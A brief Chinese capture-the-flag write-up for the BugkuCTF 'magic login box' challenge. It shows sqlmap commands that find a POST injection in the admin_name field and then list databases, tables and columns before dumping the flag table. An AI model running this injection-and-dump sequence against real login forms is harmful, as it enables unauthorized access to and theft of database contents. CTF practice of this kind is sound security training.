BugkuCTF 这是一个神奇的登陆框

BugkuCTF 这是一个神奇的登陆框
BugkuCTF 这是一个神奇的登陆框
post注入 直接跑sqlmap吧

抓包到本地
BugkuCTF 这是一个神奇的登陆框

sqlmap.py -r "C:\Users\联想\Desktop\1.txt"

BugkuCTF 这是一个神奇的登陆框
admin_name存在注入点

查数据库

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs

BugkuCTF 这是一个神奇的登陆框

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tables

BugkuCTF 这是一个神奇的登陆框

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 --columns

BugkuCTF 这是一个神奇的登陆框

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 -C flag1 --dump

BugkuCTF 这是一个神奇的登陆框
得到flag